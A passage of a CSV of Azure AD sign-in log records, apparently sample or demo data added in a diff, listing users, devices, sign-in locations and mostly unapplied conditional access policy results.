['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0cfe4b5b-09c7-4394-bb27-21b979b30000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0cfe4b5b-09c7-4394-bb27-21b979b30000,SigninLogs,Sucess,36.6404686,-78.26995087
+1790,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:54.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,63279545-87f1-4112-9cf6-11e99a03931f,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:01,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",e8a8eec9-7c29-4869-b368-f10accbb0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e8a8eec9-7c29-4869-b368-f10accbb0100,SigninLogs,Sucess,47.62879181,-122.0423737
+1791,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c2ae1853-5a7b-4f07-b7ca-9286ddbd72b4,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b125da47-83a8-4791-90e4-983bae6e0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b125da47-83a8-4791-90e4-983bae6e0000,SigninLogs,Sucess,36.6404686,-78.26995087
+1792,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c2ae1853-5a7b-4f07-b7ca-9286ddbd72b4,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b125da47-83a8-4791-90e4-983bae6e0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b125da47-83a8-4791-90e4-983bae6e0000,SigninLogs,Sucess,36.6404686,-78.26995087
+1793,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:28.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3fc4c47f-a758-4b3a-98d3-c78ea10a830e,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:02,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6dc60ed6-65c2-4a1b-994c-e296fe640100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6dc60ed6-65c2-4a1b-994c-e296fe640100,SigninLogs,Sucess,47.62879181,-122.0423737
+1794,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:53,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5733c6a6-833e-448a-9ecf-b3a1fec61d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5733c6a6-833e-448a-9ecf-b3a1fec61d00,SigninLogs,Sucess,32.0840416,34.88776016
+1795,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:22.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50387ab0-0d8c-41d1-9751-c1147c02f094,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:03,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5365b823-25fd-47eb-8ba3-275b53080200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5365b823-25fd-47eb-8ba3-275b53080200,SigninLogs,Sucess,47.62879181,-122.0423737
+1796,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:34.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9cf72c2b-aa6a-41ec-adc7-3fa2e4c70100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9cf72c2b-aa6a-41ec-adc7-3fa2e4c70100,SigninLogs,Sucess,33.0175209,35.44601059
